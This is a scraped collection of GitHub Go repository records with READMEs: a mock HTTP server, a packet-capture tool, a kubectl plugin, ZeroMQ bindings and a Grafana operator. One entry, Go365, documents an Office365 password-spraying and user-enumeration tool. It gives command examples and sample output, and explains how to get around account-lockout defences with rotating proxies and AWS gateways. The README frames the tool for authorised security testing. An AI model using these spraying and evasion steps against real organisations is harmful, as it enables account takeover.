This can be useful for performance tests where you want to simulate a more realistic scenario (i.e all integration points are painful).\n\n````yaml\n---\n# Writes a different body 50% of the time\n- body: \"This is wrong :( \"\n frequency: 0.5\n\n# Delays initial writing of response by a second 20% of the time\n- delay: 1000\n frequency: 0.2\n\n# Returns a 404 30% of the time\n- status: 404\n frequency: 0.3\n\n# Write 10,000,000 garbage bytes 9% of the time\n- garbage: 10000000\n frequency: 0.09\n````\n\n````bash\n$ mockingjay-server -config=examples/example.yaml -monkeyConfig=examples/monkey-business.yaml\n2015/04/17 14:19:53 Serving 3 endpoints defined from examples/example.yaml on port 9090\n2015/04/17 14:19:53 Monkey config loaded\n2015/04/17 14:19:53 50% of the time | Body: This is wrong :(\n2015/04/17 14:19:53 20% of the time | Delay: 1s\n2015/04/17 14:19:53 30% of the time | Status: 404\n2015/04/17 14:19:53 9% of the time | Garbage bytes: 10000000\n````\n\n## Building\n\n### Requirements\n\n- Go 1.3+ installed ($GOPATH set, et al)\n- golint https://github.com/golang/lint\n\n### Build application\n\n````bash\n$ go get github.com/quii/mockingjay-server\n$ cd $GOPATH/src/github.com/quii/mockingjay-server\n$ ./build.sh\n````\n\nMIT license\n", "readme_type": "markdown", "hn_comments": "This is a project born of my frustration of making fake servers and CDCs over and over again as we break our monolith into tiny pieces.I figured the requirements for both fake servers and CDCs in a lot of cases are the same. \"Given a request, i want this response\". So I thought, why not just define it once in configuration and be done with it. This stops the two things getting out of sync.The wiki has lots of info as to how to use it and what the point of it is. Would appreciate any feedback, apart from mean things.I've encountered the same frustration and created Dockpit (https://dockpit.io) as a solution; it uses Docker containers though.A genuine question, how is it differentiated from Stubby? http://stub.by/We use Pact[1], but the idea of flakeyness is interesting. Would you end up with non deterministic builds with the flakeyness? I imagine you could get enough 404's to trigger a Circuit Breaker in your application and this would propagate to tests sometimes failing.[1]: https://github.com/realestate-com-au/pact", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "optiv/Go365", "link": "https://github.com/optiv/Go365", "tags": [], "stars": 532, "description": "An Office365 User Attack Tool", "lang": "Go", "repo_lang": "", "readme": "# Go365 v2.0\n\n- Fixed AWS gateway issues (thanks h0useh3ad!)\n- No longer dies when proxy server connections fail\n- Added the graph endpoint\n\n**Please read all of this README before using Go365!**\n\nGo365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use. When queried with an email address and password, the endpoint responds with an Azure AD Authentication and Authorization code. This code is then processed by Go365 and the result is printed to screen or an output file.\n\n\\* User enumeration is performed in conjunction with a password guess attempt. Thus, there is no specific flag or funtionality to perform only user enumeration. 
Instead, conduct your first password guessing attack, then parse the results for valid users.\n\n##### Read these three bullets!\n\n- This tool might not work on **all** domains that utilize o365. Tests show that it works with most federated domains. Some domains will only report valid users even if a valid password is also provided. Your results may vary!\n- The domains this tool was tested on showed that it did not actually lock out accounts after multiple password failures. Your results may vary!\n- This tool is intended to be used by security professionals that are authorized to \"attack\" the target organization's o365 instance.\n\n## Obtaining\n\n#### Option 0\n\nDownload a pre-compiled binary for your OS [HERE](https://github.com/optiv/Go365/releases).\n\n#### Option 1\n\nDownload the source and compile locally.\n\n1. Install Go.\n2. Clone the repo.\n3. Navigate to the repo and compile ya dingus.\n\n```\ngo build Go365.go\n```\n\n4. Run the resulting binary\n\n## Usage\n\n```\n$ ./Go365\n\n \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001 \u2001\u2001\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001 \u2588\u2588\n \u2588\u2588\u2001 \u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2001\u2001 \u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2001 \u2588\u2588\u2001\u2588\u2588\u2001 \u2588\u2588\u2001 \u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001\u2588\u2588\n\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\n\n Version: 2.0\n Authors: paveway3, h0useh3ad, S4R1N, EatonChips\n\nUsage:\n\n -h Shows this stuff\n\n\n Required - Endpoint:\n\n -endpoint [rst or graph] Specify which endpoint to use\n : (-endpoint rst) *Classic Go365!* login.microsoftonline.com/rst2.srf. SOAP XML request with XML response\n : (-endpoint graph) login.microsoft.com/common/oauth2/token. 
HTTP POST request with JSON Response\n\n Required - Usernames and Passwords:\n\n -u Single username to test\n : Username with or without \"@domain.com\"\n : Must also provide -d flag to specify the domain\n : (-u legitfirst.lastname@totesrealdomain.com)\n\n -ul Username list to use (overrides -u)\n : File should contain one username per line\n : Usernames can have \"@domain.com\"\n : If no domain is specified, the -d domain is used\n : (-ul ./usernamelist.txt)\n\n -p Password to attempt\n : Enclose in single quotes if it contains special characters\n : (-p password123) or (-p 'p@s$w0|2d')\n\n -pl Password list to use (overrides -p)\n : File should contain one password per line\n : -delay flag can be used to include a pause between each set of attempts\n : (-pl ./passwordlist.txt)\n\n -up Userpass list to use (overrides all the above options)\n : One username and password separated by a \":\" per line\n : Be careful of duplicate usernames!\n : (-up ./userpasslist.txt)\n\n Required/Optional - Domain:\n\n -d Domain to test\n : Use this if the username or username list does not include \"@targetcompany.com\"\n : (-d targetcompany.com)\n\n Optional:\n\n -w Time to wait between attempts in seconds.\n : Default: 1 second. 5 seconds recommended.\n : (-w 10)\n\n -delay Delay (in seconds) between sprays when using a password list.\n : Default: 60 minutes (3600 seconds) recommended.\n : (-delay 7200)\n\n -o Output file to write to\n : Will append if file exists, otherwise a file is created\n : (-o ./Go365output.out)\n\n -proxy Single SOCKS5 proxy server to use\n : IP address and Port separated by a \":\"\n : SOCKS5 proxy\n : (-proxy 127.0.0.1:1080)\n\n -proxyfile A file with a list of SOCKS5 proxy servers to use\n : IP address and Port separated by a \":\" on each line\n : Randomly selects a proxy server to use before each request\n : (-proxyfile ./proxyfile.txt)\n\n -url Endpoint to send requests to\n : Amazon API Gateway 'Invoke URL'\n : Highly recommended that you use this option. Google it, or\n : check this out: https://bigb0sss.github.io/posts/redteam-rotate-ip-aws-gateway/\n : (-url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login)\n\n -debug Debug mode.\n : Print xml response\n```\n\n### Examples\n\n```\n ./Go365 -endpoint rst -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com\n ./Go365 -endpoint graph -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5\n ./Go365 -endpoint rst -up ./userpass_list.txt -delay 3600 -d pwnthisfakedomain.com -w 5 -o Go365output.txt\n ./Go365 -endpoint graph -u legituser -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxy 127.0.0.1:1080\n ./Go365 -endpoint rst -u legituser -pl ./pass_list.txt -delay 1800 -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxyfile ./proxyfile.txt\n ./Go365 -endpoint graph -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login\n\n You can even schedule out your entire password guessing campaign using the -pl and -delay flags :)\n ./Go365 -endpoint rst -ul ./user_list.txt -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login -proxyfile listofprox.txt -pl listofpasswords.txt -delay 7200\n\n *Protip: If you get a lot of \"Account locked out\" responses, then you might wanna proxy or use an AWS Gateway.\n```\n\n## Account Locked Out! 
(Domain Defenses)\n\n**protip:** _You probably aren't **actually** locking out accounts._\n\nAfter a number of queries against a target domain, results might start reporting that accounts are locked out.\n\nOnce this defense is triggered, **user enumeration becomes unreliable since requests for valid and invalid users will randomly report that their accounts have been locked out**.\n\n```\n...\n[-] User not found: test.user90@pwnthisfakedomain.com\n[-] User not found: test.user91@pwnthisfakedomain.com\n[-] Valid user, but invalid password: test.user92@pwnthisfakedomain.com\n[!] Account Locked Out: real.user1@pwnthisfakedomain.com\n[-] Valid user, but invalid password: test.user93@pwnthisfakedomain.com\n[!] Account Locked Out: valid.user94@pwnthisfakedomain.com\n[!] Account Locked Out: jane.smith@pwnthisfakedomain.com\n[-] Valid user, but invalid password: real.user95@pwnthisfakedomain.com\n[-] Valid user, but invalid password: fake.user96@pwnthisfakedomain.com\n[!] Account Locked Out: valid.smith@pwnthisfakedomain.com\n...\n```\n\nThis is a defensive mechanism triggered by the number of **valid** user queries against the target domain within a certain period of **time**. The number of attempts and the period of time will vary depending on the target domain since the thresholds can be customized by the target organization.\n\n### Countering Defenses\n\n#### Wait time\n\nThe defensive mechanism is **time** and **IP address** based. Go365 provides options to include a wait time between requests and proxy options to distribute the source of the requests. To circumvent the defensive mechanisms on your target domain, use a long wait time and multiple proxy servers.\n\nA wait time of AT LEAST 15 seconds is recommended. `-w 15`\n\n#### SOCKS5 Proxies\n\nIf you still get \"account locked out\" responses, start proxying your requests. Proxy options have only been tested on SSH SOCKS5 dynamic proxies (`ssh -D user@proxyserver`)\n\nCreate a bunch of SOCKS5 proxies on DO or AWS or Vultr or whatever and make a file that looks like this:\n\n```\n127.0.0.1:8081\n127.0.0.1:8082\n127.0.0.1:8083\n127.0.0.1:8084\n127.0.0.1:8085\n127.0.0.1:8086\n...\n```\n\nThe tool will randomly iterate through the provided proxy servers and wait for the specified amount of time between requests.\n\n`-w 15 -proxyfile ./proxies.txt`\n\n#### Amazon API Gateway\n\nAdditionally, an endpoint url may be specified so this tool can interface with Amazon API Gateway. Setup a gateway to point to the `https://login.microsoftonline.com/rst2.srf` endpoint, then set the -url parameter to the provided `Invoke URL`. Your IP should be rotated with each request.\n\n`-url https://justanexample.execute-api.us-east-2.amazonaws.com/login`", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hsiafan/httpdump", "link": "https://github.com/hsiafan/httpdump", "tags": ["capture", "pcap-analyzer", "http"], "stars": 532, "description": "Capture and parse http traffics", "lang": "Go", "repo_lang": "", "readme": "Parse and display http traffic from network device or pcap file. 
This is a go version of origin pcap-parser, thanks to gopacket project, this tool has simpler code base and is more efficient.\n\nFor original python implementation, [refer to httpcap on pypi](https://pypi.org/project/httpcap/).\n\nNote: This tool **can not parse HTTPS/HTTP2 traffics**.\n\n# Install & Requirement\nBuild httpdump requires libpcap-dev and cgo enabled.\n## libpcap\nfor ubuntu/debian:\n\n```sh\nsudo apt install libpcap-dev\n```\n\nfor centos/redhat/fedora:\n\n```sh\nsudo yum install libpcap-devel\n```\n\nfor osx:\n\nLibpcap and header files should be available in macOS already.\n\n## Install\n\n```sh\ngo get github.com/hsiafan/httpdump\n```\n\n\n# Usage\nhttpdump can read from pcap file, or capture data from network interfaces. Usage:\n\n```\nUsage: httpdump \n -curl\n \tOutput an equivalent curl command for each http request\n -device string\n \tCapture packet from network device. If is any, capture all interface traffics (default \"any\")\n -dump-body\n \tdump http request/response body to file\n -file string\n \tRead from pcap file. If not set, will capture data from network device by default\n -force\n \tForce print unknown content-type http body even if it seems not to be text content\n -host string\n \tFilter by request host, using wildcard match(*, ?)\n -idle duration\n \tIdle time to remove connection if no package received (default 4m0s)\n -ip string\n \tFilter by ip, if either source or target ip is matched, the packet will be processed\n -level string\n \tOutput level, options are: url(only url) | header(http headers) | all(headers, and textuary http body) (default \"header\")\n -output string\n \tWrite result to file [output] instead of stdout\n -port uint\n \tFilter by port, if either source or target port is matched, the packet will be processed.\n -pretty\n \tTry to format and prettify json content\n -status string\n \tFilter by response status code. Can use range. 
eg: 200, 200-300 or 200:300-400\n -uri string\n \tFilter by request url path, using wildcard match(*, ?)\n\n```\n\n## Samples\nA simple capture:\n\n```\n$ httpdump\n192.168.110.48:56585 -----> 101.201.170.152:80\nGET / HTTP/1.1\nHost: geek.csdn.net\nConnection: keep-alive\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\nDNT: 1\nAccept-Encoding: gzip, deflate, sdch\nAccept-Language: zh-CN,zh;q=0.8\nCookie: uuid_tt_dd=-7445280944848876972_20160309; _JQCMT_ifcookie=1; _JQCMT_browser=8cc6c51a0610de98f19cf86af0855a3e; lzstat_uv=24444940273412920400|2839507@3117794@3311294\n\n\n101.201.170.152:80 <----- 192.168.110.48:56585\nHTTP/1.1 200 OK\nServer: openresty\nDate: Tue, 31 May 2016 02:40:14 GMT\nContent-Type: text/html; charset=utf-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nKeep-Alive: timeout=20\nVary: Accept-Encoding\nVary: Accept-Encoding\nContent-Encoding: gzip\n\n{body size: 15482 , set level arg to all to display body content}\n```\n\nMore:\n\n```sh\n# parse pcap file\nsudo tcpdump -wa.pcap tcp\nhttpdump -file a.pcap\n\n# capture specified device:\nhttpdump -device eth0\n\n# filter by ip and/or port\nhttpdump -port 80 # filter by port\nhttpdump -ip 101.201.170.152 # filter by ip\nhttpdump -ip 101.201.170.152 -port 80 # filter by ip and port\n```\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "corneliusweig/ketall", "link": "https://github.com/corneliusweig/ketall", "tags": ["kubectl-plugins", "kubectl", "kubectl-plugin", "get", "resources", "resource-list", "k8s", "overview"], "stars": 532, "description": "Like `kubectl get all`, but get really all resources", "lang": "Go", "repo_lang": "", "readme": "# ketall\n[![Build Status](https://travis-ci.com/corneliusweig/ketall.svg?branch=master)](https://travis-ci.com/corneliusweig/ketall)\n[![Go Report Card](https://goreportcard.com/badge/corneliusweig/ketall)](https://goreportcard.com/report/corneliusweig/ketall)\n[![LICENSE](https://img.shields.io/github/license/corneliusweig/ketall.svg)](https://github.com/corneliusweig/ketall/blob/master/LICENSE)\n[![Releases](https://img.shields.io/github/release-pre/corneliusweig/ketall.svg)](https://github.com/corneliusweig/ketall/releases)\n\n\nKubectl plugin to show really all kubernetes resources\n\n## Intro\nFor a complete overview of all resources in a kubernetes cluster, `kubectl get all --all-namespaces` is not enough, because it simply does not show everything.\nThis helper lists _really_ all resources the cluster has to offer.\n\n## Demo\n![ketall demo](doc/demo.gif \"ketall demo\")\n\n## Examples\nGet all resources...\n- ... excluding events (this is hardly ever useful)\n ```bash\n ketall\n ```\n\n- ... _including_ events\n ```bash\n ketall --exclude=\n ```\n\n- ... created in the last minute\n ```bash\n ketall --since 1m\n ```\n This flag understands typical human-readable durations such as `1m` or `1y1d1h1m1s`.\n\n- ... in the default namespace\n ```bash\n ketall --namespace=default\n ```\n\n- ... at cluster level\n ```bash\n ketall --only-scope=cluster\n ```\n\n- ... using list of cached server resources\n ```bash\n ketall --use-cache\n ```\n Note that this may fail to show __really__ everything, if the http cache is stale.\n\n- ... 
and combine with common `kubectl` options\n ```bash\n KUBECONFIG=otherconfig ketall -o name --context some --namespace kube-system --selector run=skaffold\n ```\n\nAlso see [Usage](doc/USAGE.md).\n\n## Installation\nThere are several ways to install `ketall`. The recommended installation method is via `krew`.\n\n### Via krew\nKrew is a `kubectl` plugin manager. If you have not yet installed `krew`, get it at\n[https://github.com/kubernetes-sigs/krew](https://github.com/kubernetes-sigs/krew).\nThen installation is as simple as\n```bash\nkubectl krew install get-all\n```\nThe plugin will be available as `kubectl get-all`, see [doc/USAGE](doc/USAGE.md) for further details.\n\n### Binaries\nWhen using the binaries for installation, also have a look at [doc/USAGE](doc/USAGE.md).\n\n#### Linux\n```bash\ncurl -Lo ketall.gz https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-linux.tar.gz && \\\n gunzip ketall.gz && chmod +x ketall && mv ketall $GOPATH/bin/\n```\n\n#### OSX\n```bash\ncurl -Lo ketall.gz https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-darwin.tar.gz && \\\n gunzip ketall.gz && chmod +x ketall && mv ketall $GOPATH/bin/\n```\n\n#### Windows\n[https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-windows.zip](https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-windows.zip)\n\n### From source\n\n#### Build on host\n\nRequirements:\n - go 1.16 or newer\n - GNU make\n - git\n\nCompiling:\n```bash\nexport PLATFORMS=$(go env GOOS)\nmake all # binaries will be placed in out/\n```\n\n#### Build in docker\nRequirements:\n - docker\n\nCompiling:\n```bash\nmkdir ketall && chdir ketall\ncurl -Lo Dockerfile https://raw.githubusercontent.com/corneliusweig/ketall/master/Dockerfile\ndocker build . -t ketall-builder\ndocker run --rm -v $PWD:/go/bin/ --env PLATFORMS=$(go env GOOS) ketall-builder\ndocker rmi ketall-builder\n```\nBinaries will be placed in the current directory.\n\n## Future\n- additional arguments could be used to filter the result set\n\n### Credits\nIdea by @ahmetb https://twitter.com/ahmetb/status/1095374856156196864\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zeromq/goczmq", "link": "https://github.com/zeromq/goczmq", "tags": [], "stars": 532, "description": "goczmq is a golang wrapper for CZMQ.", "lang": "Go", "repo_lang": "", "readme": "# goczmq [![Build Status](https://travis-ci.org/zeromq/goczmq.svg?branch=master)](https://travis-ci.org/zeromq/goczmq) [![Doc Status](https://godoc.org/github.com/zeromq/goczmq?status.png)](https://godoc.org/github.com/zeromq/goczmq)\n\n## Introduction\nA golang interface to the [CZMQ v4.2](http://czmq.zeromq.org) API.\n\n## Install\n### Dependencies\n* [libsodium](https://github.com/jedisct1/libsodium)\n* [libzmq](https://github.com/zeromq/libzmq)\n* [czmq](https://github.com/zeromq/czmq)\n\n### For CZMQ master\n```\ngo get github.com/zeromq/goczmq\n```\n#### A Note on Build Tags\nThe CZMQ library includes experimental classes that are not built by default, but can be built\nby passing `--enable-drafts` to configure. Support for these draft classes are being added\nto goczmq. 
To build these features against a CZMQ that has been compiled with `--enable-drafts`,\nuse `go build -tags draft`.\n\n### For CMZQ = 4.2\n```\ngo get gopkg.in/zeromq/goczmq.v4\n```\n**Note**: [CZMQ 4.2](https://github.com/zeromq/czmq/releases) is has not been released yet.\n\n### For CZMQ Before 4.0\n```\ngo get gopkg.in/zeromq/goczmq.v1\n```\n## Usage\n### Direct CZMQ Sock API\n#### Example\n```go\npackage main\n\nimport (\n\t\"log\"\n\n\t\"github.com/zeromq/goczmq\"\n)\n\nfunc main() {\n\t// Create a router socket and bind it to port 5555.\n\trouter, err := goczmq.NewRouter(\"tcp://*:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer router.Destroy()\n\n\tlog.Println(\"router created and bound\")\n\n\t// Create a dealer socket and connect it to the router.\n\tdealer, err := goczmq.NewDealer(\"tcp://127.0.0.1:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer dealer.Destroy()\n\n\tlog.Println(\"dealer created and connected\")\n\n\t// Send a 'Hello' message from the dealer to the router.\n\t// Here we send it as a frame ([]byte), with a FlagNone\n\t// flag to indicate there are no more frames following.\n\terr = dealer.SendFrame([]byte(\"Hello\"), goczmq.FlagNone)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Println(\"dealer sent 'Hello'\")\n\n\t// Receive the message. Here we call RecvMessage, which\n\t// will return the message as a slice of frames ([][]byte).\n\t// Since this is a router socket that support async\n\t// request / reply, the first frame of the message will\n\t// be the routing frame.\n\trequest, err := router.RecvMessage()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router received '%s' from '%v'\", request[1], request[0])\n\n\t// Send a reply. First we send the routing frame, which\n\t// lets the dealer know which client to send the message.\n\t// The FlagMore flag tells the router there will be more\n\t// frames in this message.\n\terr = router.SendFrame(request[0], goczmq.FlagMore)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router sent 'World'\")\n\n\t// Next send the reply. 
The FlagNone flag tells the router\n\t// that this is the last frame of the message.\n\terr = router.SendFrame([]byte(\"World\"), goczmq.FlagNone)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Receive the reply.\n\treply, err := dealer.RecvMessage()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"dealer received '%s'\", string(reply[0]))\n}\n```\n#### Output\n```\n2015/05/26 21:52:52 router created and bound\n2015/05/26 21:52:52 dealer created and connected\n2015/05/26 21:52:52 dealer sent 'Hello'\n2015/05/26 21:52:52 router received 'Hello' from '[0 103 84 189 175]'\n2015/05/26 21:52:52 router sent 'World'\n2015/05/26 21:52:52 dealer received 'World'\n```\n### io.ReadWriter support\n#### Example\n```go\npackage main\n\nimport (\n\t\"log\"\n\n\t\"github.com/zeromq/goczmq\"\n)\n\nfunc main() {\n\t// Create a router socket and bind it to port 5555.\n\trouter, err := goczmq.NewRouter(\"tcp://*:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer router.Destroy()\n\n\tlog.Println(\"router created and bound\")\n\n\t// Create a dealer socket and connect it to the router.\n\tdealer, err := goczmq.NewDealer(\"tcp://127.0.0.1:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer dealer.Destroy()\n\n\tlog.Println(\"dealer created and connected\")\n\n\t// Send a 'Hello' message from the dealer to the router,\n\t// using the io.Write interface\n\tn, err := dealer.Write([]byte(\"Hello\"))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"dealer sent %d byte message 'Hello'\\n\", n)\n\n\t// Make a byte slice and pass it to the router\n\t// Read interface. When using the ReadWriter\n\t// interface with a router socket, the router\n\t// caches the routing frames internally in a\n\t// FIFO and uses them transparently when\n\t// sending replies.\n\tbuf := make([]byte, 16386)\n\n\tn, err = router.Read(buf)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router received '%s'\\n\", buf[:n])\n\n\t// Send a reply.\n\tn, err = router.Write([]byte(\"World\"))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router sent %d byte message 'World'\\n\", n)\n\n\t// Receive the reply, reusing the previous buffer.\n\tn, err = dealer.Read(buf)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"dealer received '%s'\", string(buf[:n]))\n}\n```\n#### Output\n```\n2015/05/26 21:54:10 router created and bound\n2015/05/26 21:54:10 dealer created and connected\n2015/05/26 21:54:10 dealer sent 5 byte message 'Hello'\n2015/05/26 21:54:10 router received 'Hello'\n2015/05/26 21:54:10 router sent 5 byte message 'World'\n2015/05/26 21:54:10 dealer received 'World'\n```\n### Thread safe channel interface\n#### Example\n```go\npackage main\n\nimport (\n\t\"log\"\n\n\t\"github.com/zeromq/goczmq\"\n)\n\nfunc main() {\n\t// Create a router channeler and bind it to port 5555.\n\t// A channeler provides a thread safe channel interface\n\t// to a *Sock\n\trouter := goczmq.NewRouterChanneler(\"tcp://*:5555\")\n\tdefer router.Destroy()\n\n\tlog.Println(\"router created and bound\")\n\n\t// Create a dealer channeler and connect it to the router.\n\tdealer := goczmq.NewDealerChanneler(\"tcp://127.0.0.1:5555\")\n\tdefer dealer.Destroy()\n\n\tlog.Println(\"dealer created and connected\")\n\n\t// Send a 'Hello' message from the dealer to the router.\n\tdealer.SendChan <- [][]byte{[]byte(\"Hello\")}\n\tlog.Println(\"dealer sent 'Hello'\")\n\n\t// Receve the message as a [][]byte. 
Since this is\n\t// a router, the first frame of the message wil\n\t// be the routing frame.\n\trequest := <-router.RecvChan\n\tlog.Printf(\"router received '%s' from '%v'\", request[1], request[0])\n\n\t// Send a reply. First we send the routing frame, which\n\t// lets the dealer know which client to send the message.\n\trouter.SendChan <- [][]byte{request[0], []byte(\"World\")}\n\tlog.Printf(\"router sent 'World'\")\n\n\t// Receive the reply.\n\treply := <-dealer.RecvChan\n\tlog.Printf(\"dealer received '%s'\", string(reply[0]))\n}\n```\n#### Output\n```\n2015/05/26 21:56:43 router created and bound\n2015/05/26 21:56:43 dealer created and connected\n2015/05/26 21:56:43 dealer sent 'Hello'\n2015/05/26 21:56:43 received 'Hello' from '[0 12 109 153 35]'\n2015/05/26 21:56:43 router sent 'World'\n2015/05/26 21:56:43 dealer received 'World'\n```\n## GoDoc\n[godoc](https://godoc.org/github.com/zeromq/goczmq)\n\n## See Also\n* [Peter Kleiweg's](https://github.com/pebbe) [zmq4](https://github.com/pebbe/zmq4) bindings\n\n## License\nThis project uses the MPL v2 license, see LICENSE\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "grafana-operator/grafana-operator", "link": "https://github.com/grafana-operator/grafana-operator", "tags": ["grafana-operator", "kubernetes", "operator", "grafana", "k8s", "golang", "go", "observability", "monitoring", "openshift", "community", "open-source", "hacktober", "kubernetes-operator", "openshift-v4"], "stars": 532, "description": "An operator for Grafana that installs and manages Grafana instances, Dashboards and Datasources through Kubernetes/OpenShift CRs", "lang": "Go", "repo_lang": "", "readme": "# Grafana Operator\n\nAn operator to provision and manage Grafana Instances, Dashboards, Datasources and notification channels. Based on the [Operator-SDK](https://sdk.operatorframework.io/)\n\n## Companies and teams that trust and use the Grafana operator\n\n| Company | Logo | Company | Logo\n| :--- | :----: | :--- | :----: |\n| [Red Hat](https://www.redhat.com)| | [Integreatly](https://www.redhat.com/en/products/integration)| |\n [Continental](https://www.continental.com/)| | [Handelsbanken](\"https://www.handelsbanken.se/en/\")||\n| [Xenit](https://xenit.se/contact/)|| [Torqata](https://torqata.com)| |\n|[Operate-first](https://www.operate-first.cloud/)| | [iFood](https://www.ifood.com.br)| |\n\n***If you find this operator useful in your product/deployment, feel free to send a pull request to add your company/team to be displayed here!***\n\n## Grafana Operator on the Kubernetes community Slack\n\nWe have set up a channel dedicated to this operator on the Kubernetes community Slack, this is an easier way to address\nmore immediate issues and facilitate discussion around development/bugs etc. 
as well as providing support for questions\nabout the operator.\n\n1: Join the Kubernetes Slack (if you have not done so already) [Kubernetes Slack](https://slack.k8s.io/).\n\n2: You will receive an email with an invitation link, follow that link and enter your desired username and password for the workspace(it might be easier if you use your Github username for our channel).\n\n3: Once registered and able to see the Kubernetes community Slack workspace and channels follow this link to the [grafana-operator channel](https://kubernetes.slack.com/messages/grafana-operator/ ).\n\nAlternatively:\nIf you're already a member of that workspace then just follow this link to the [grafana-operator channel](https://kubernetes.slack.com/messages/grafana-operator/)\nor search for \"grafana-operator\" in the browse channels option.\n\n![image](https://user-images.githubusercontent.com/35736504/90978105-0b195300-e543-11ea-86ee-1825da0e3b75.png)\n\n## Current status\n\nAll releases of the operator can be found on [Operator Hub](https://operatorhub.io/operator/grafana-operator).\n\n***Sometimes a release may take a few hours (in rare cases, days) to land on Operatorhub, please be patient, it's out of our control.***\n\n### Supported Versions\n\n#### v3.x\n\n***This version has known vulnerabilities present, rooted in the version of the operator-sdk that was used, please upgrade to v4(operator-sdk v1.3.0) to mitigate the risk***\n\nThis version of the operator will be deprecated in the near future, we recommend new users to install v4 and existing users to upgrade as soon as possible using the [upgrade guide](./documentation/upgrade.md).\n\nWe won't be accepting any new features for v3, the only releases made under this version will be either bug-fixes or security patches.\n\nThe operator-sdk is an exception to the security patch rule, it cannot be updated without introducing breaking changes, hence the recommendation to upgrade to v4, which mitigates these CVEs.\n\nThe documentation for this version can be found here: [https://github.com/grafana-operator/grafana-operator/tree/v3/documentation](https://github.com/grafana-operator/grafana-operator/tree/v3/documentation).\n\n#### v4.x (master)\n\nThis is the current main branch of the project, all future development will take place here, any new features and improvements should be submitted against this branch.\n\nPlease use the following link to access documentation at any given release of the operator:\n\n```txt\nhttps://github.com/grafana-operator/grafana-operator/tree//documentation\n```\n\n## Summary of benefits\n\nWhy decide to go with the Grafana-operator over a standard standalone Grafana deployment for your monitoring stack?\n\nIf [the benefits of using an operator over standalone products as outlined by the people that created them](https://operatorframework.io/) and our current high-profile users aren't enough to convince you, here's some more:\n\n* The ability to configure and manage your entire Grafana with the use Kubernetes resources such as CRDs, configMaps, Secrets etc.\n* Automation of:\n * Ingresses.\n * Grafana product versions.\n * Grafana dashboard plugins.\n * Grafana datasources.\n * Grafana notification channel provisioning.\n * Oauth proxy.\n * many others!\n* Efficient dashboard management through jsonnet, plugins, organizations and folder assignment, which can all be done through `.yamls`!\n* Both Kubernetes and OpenShift supported out of the box.\n* Multi-Arch builds and container images.\n* Operatorhub/OLM support (Allows you to 
